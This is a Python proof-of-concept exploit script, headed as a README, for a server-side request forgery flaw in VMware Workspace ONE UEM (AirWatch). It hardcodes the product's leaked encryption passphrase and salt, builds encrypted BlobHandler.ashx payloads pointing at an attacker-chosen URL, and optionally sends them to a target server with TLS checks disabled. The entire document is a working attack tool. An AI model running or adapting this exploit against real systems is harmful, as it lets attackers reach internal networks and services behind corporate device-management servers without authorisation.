README.md
Rendering markdown...
from Crypto.Cipher import AES
from Crypto import Random
from Crypto.Protocol.KDF import PBKDF2
import base64, sys, argparse, requests
from urllib.parse import urljoin
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
#https://stackoverflow.com/a/41041028/13886183
try:
requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
pass
class SSRFCrypto:
def getKey(self):
if self.Key == None:
self.Key = PBKDF2(self.PassPhrase, self.SaltValue, self.KeySize // 8, count=self.PasswordIterations)
return self.Key
def __init__(self):
self.PassPhrase = '5c5e2c554f4f644b54383127495b356d7b36714e4b214a6967492657290123a0'
self.SaltValue = 's@1tValue'
self.KeySize = 256
self.KeyVersion = 'kv0'
self.CryptoVersion = 'awev2'
self.PasswordIterations = 200000
self.Key = None
def getIV(self):
return Random.new().read(12)
def encryptWithKeyIv(self, text, key, iv):
aesCipher = AES.new(key, AES.MODE_GCM, iv)
ciphertext, tag = aesCipher.encrypt_and_digest(text)
r = chr(len(tag)).encode() + tag + ciphertext
return chr(len(tag)).encode() + tag + ciphertext
def decryptWithKeyIv(self, payload, key, iv):
tagLen = payload[0]
if tagLen > 0:
tag = payload[1:tagLen + 1]
payload = payload[tagLen + 1:]
aesCipher = AES.new(key, AES.MODE_GCM, iv)
return aesCipher.decrypt_and_verify(payload, tag)
return None
def EncryptString(self, text):
iv = self.getIV()
key = self.getKey()
payload = self.encryptWithKeyIv(text.encode(), key, iv)
payload = base64.b64encode(payload).decode()
payload = "{0}:{1}:{2}:{3}".format(self.CryptoVersion, self.KeyVersion, base64.b64encode(iv).decode(), payload)
payload = list(payload.encode())
unicode_arr = []
for i in payload:
unicode_arr.append(i)
unicode_arr.append(0)
return base64.b64encode(bytearray(unicode_arr)).decode()
def normalize(self, arr):
ret = []
for i in list(arr):
if i == 0:
continue
ret.append(i)
return bytearray(ret).decode()
def DecryptString(self, payload):
try:
payload = self.normalize(base64.b64decode(payload))
except Exception as e:
print('payload:', e)
return None
if payload.count(':') != 3:
return None
cryptoVersion, keyVersion, iv, cipher = payload.split(':')
if len(cryptoVersion) < 1 or len(keyVersion) < 1 or len(iv) < 1 or len(cipher) < 1:
return None
if self.CryptoVersion != cryptoVersion:
print('Invalid CryptoVersion')
return None
if self.KeyVersion != keyVersion:
print('Invalid KeyVersion')
return None
try:
iv = base64.b64decode(iv.encode())
except Exception as e:
print('IV:', e)
return None
if len(iv) != 12:
print('Invalid IV')
return None
try:
cipher = base64.b64decode(cipher.encode())
except Exception as e:
print('Cipher:', e)
return None
return self.decryptWithKeyIv(cipher, self.getKey(), iv).decode()
def generate_url(baseurl, payload, airwatch):
return urljoin(baseurl, ('/AirWatch/BlobHandler.ashx?Url=' if airwatch else '/Catalog/BlobHandler.ashx?Url=') + payload)
def request_url(url, timeout=30, proxy=None, debug=None, method='GET', data=None, headers={}):
try:
if 'user-agent' not in headers:
headers['user-agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'
res = requests.request(method, url, headers=headers, data=data, timeout=timeout, verify=False, allow_redirects=False, proxies=({'http': proxy, 'https': proxy} if proxy else None))
if debug:
print('HTTP/1.1 {0} {1}'.format(res.status_code, res.reason))
for key in res.headers:
print('{0}: {1}'.format(key, res.headers[key]))
print()
print(res.text)
except Exception as e:
print(e)
class Extender(argparse.Action):
def __call__(self,parser,namespace,values,option_strings=None):
#Need None here incase `argparse.SUPPRESS` was supplied for `dest`
dest = getattr(namespace,self.dest,None)
#print dest,self.default,values,option_strings
if(not hasattr(dest,'extend') or dest == self.default):
dest = []
setattr(namespace,self.dest,dest)
#if default isn't set to None, this method might be called
# with the default as `values` for other arguements which
# share this destination.
parser.set_defaults(**{self.dest:None})
try:
dest.extend(values)
except ValueError:
dest.append(values)
def parse_headers(headers):
ret = {}
if headers:
for i in headers:
t = i.split(':')
if len(t) == 2 and len(t[0]) > 0 and len(t[1]) > 0:
ret[t[0].lower().replace(' ', '')] = t[1][1:] if t[1].startswith(' ') else t[1]
return ret
def main():
#Based in assetnote script
# https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/
argparser = argparse.ArgumentParser()
argparser.add_argument("--url", help="AirWatch URL (i.e. https://mdm.corp.evilcorp.com)")
argparser.add_argument("--ssrf", help="SSRF URL (i.e. https://example.com", default='https://example.com')
argparser.add_argument("--airwatch", help="Use Airwatch route instead of Catalog", action='store_true')
argparser.add_argument("--request", help="Request the SSRF URL after generating", action='store_true')
argparser.add_argument('--proxy', help='Use proxy, ex: --proxy=http://127.0.0.1:8080', type=str)
argparser.add_argument('--decrypt', help='Decrypt payload', type=str)
argparser.add_argument('--timeout', help='Http timeout request', type=int, default=15)
argparser.add_argument("--debug-headers", help="View http response headers", action='store_true')
argparser.add_argument('--method', help='HTTP method to send', default='GET', type=str)
argparser.add_argument('--data', help='Send body', type=str)
argparser.add_argument('-H', '--header', help='Send headers', type=str, nargs='*', action=Extender)
args = argparser.parse_args()
if len(sys.argv) < 2:
return argparser.print_help()
vwc = SSRFCrypto()
if args.decrypt:
r = vwc.DecryptString(args.decrypt)
if r != None:
print('Result:')
print(r)
return
if not args.url:
return argparser.print_help()
payload = vwc.EncryptString(args.ssrf)
url = generate_url(args.url, payload, args.airwatch)
print('Generated SSRF payload:')
print(url + '\n')
if args.request:
headers = parse_headers(args.header)
method = args.method.lower()
if method not in ['head', 'trace', 'options', 'delete', 'put', 'post', 'get']:
method = 'get'
request_url(url, args.timeout, args.proxy, args.debug_headers, method=args.method, headers=headers, data=args.data)
if __name__ == '__main__':
main()